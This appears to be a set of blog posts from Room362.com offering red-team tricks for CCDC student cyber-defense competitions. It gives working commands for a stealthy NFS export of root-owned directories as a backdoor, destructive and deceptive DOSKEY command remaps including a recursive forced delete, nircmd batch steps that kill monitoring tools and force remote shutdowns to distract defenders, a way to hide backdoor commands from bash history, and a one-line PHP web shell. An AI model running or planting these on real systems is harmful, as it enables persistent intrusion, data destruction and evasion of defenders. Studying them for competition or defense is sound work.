Room362.com

Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap and given the right directory and permissions can lead you right back to getting shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049)

Here is a quick how-to on setting up NFS

https://help.ubuntu.com/community/SettingUpNFSHowTo

I'm sure you can think of much more evil locations but /etc/, /var/www/, and /root/ are some of my favorite exports, but there is no reason why you couldn't just export '/' that I know of. (NFSd might not permit it)

Remember to change the NFS settings so that it runs as root and you are golden.

Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY:

C:\Users\vmadmin>doskey /?
Edits command lines, recalls Windows commands, and creates macros.

DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]]
  [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename]
  [macroname=[text]]

  /REINSTALL          Installs a new copy of Doskey.
  /LISTSIZE=size      Sets size of command history buffer.
  /MACROS             Displays all Doskey macros.
  /MACROS:ALL         Displays all Doskey macros for all executables which have
                      Doskey macros.
  /MACROS:exename     Displays all Doskey macros for the given executable.
  /HISTORY            Displays all commands stored in memory.
  /INSERT             Specifies that new text you type is inserted in old text.
  /OVERSTRIKE         Specifies that new text overwrites old text.
  /EXENAME=exename    Specifies the executable.
  /MACROFILE=filename Specifies a file of macros to install.
  macroname           Specifies a name for a macro you create.
  text                Specifies commands you want to record.

UP and DOWN ARROWS recall commands; ESC clears command line; F7 displays
command history; ALT+F7 clears command history; F8 searches command
history; F9 selects a command by number; ALT+F10 clears macro definitions.

The following are some special codes in Doskey macro definitions:
$T     Command separator.  Allows multiple commands in a macro.
$1-$9  Batch parameters.  Equivalent to %1-%9 in batch programs.
$*     Symbol replaced by everything following macro name on command line.

Just like the Linux 'alias' command in some ways, you can remap pretty much any command you want. Here are some of the more evil ones I have used in the past:

• doskey cd=del /f /s $1
• doskey tasklist=cat tasklist.txt
• doskey dir=dir \..\..\..\

I'm sure you can think of a ton more..

The great thing is that there isnt' a /delete - you just have to know that in order to remove a doskey macro you just issue the command without the aliased part, so 'doskey tasklist=' will delete the tasklist macro.

One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:

http://www.nirsoft.net/utils/nircmd.html

• setdisplay 640x480
• killprocess taskmgr.exe
• killprocess procexp.exe
• win -style title "my computer" 0x00c00000
• win child title "my computer" +exstyle all 0x00400000
• win +exstyle title "my computer" 0x00400000
• win trans ititle "internet explorer" 256
• win close class "CabinetWClass"
• multiremote copy "c:\temp\computers.txt" exitwin poweroff force
• exitwin logoff
• standby
• monitor off
• win child class "Shell_TrayWnd" hide class "button"
• win hide class progman

Just to name a few...

another fun batch script to have running is 'echo knock knock | clip' in an endless and delayless loop. (I makes 'knock knock' the only thing that will ever be pasted ;-)

CORRECTION:

Thanks to jduck for pointing it out, but you need to actually make a change to get this to work, reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ and search for: Modifying History Behavior

You simply put a space before it

mubix@localhost:/tmp/demo$ ls -alh
total 8.0K
drwxr-xr-x 2 mubix mubix 4.0K Mar  1 19:43 .
drwxrwxrwt 3 root  root  4.0K Mar  1 19:43 ..
-rw-r--r-- 1 mubix mubix    0 Mar  1 19:43 bob
mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$  mysecretlogin -u bobsuruncle -p allacazaam

mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$

Works well for backdoors you don't want caught via the .bash_history as well ;-)

More CCDC tricks as I think of them..

This is mostly for my memory for CCDC

<?php system($_GET['cmd']); ?>

I wonder what will happen if a RSS reader doesn't do proper filtering...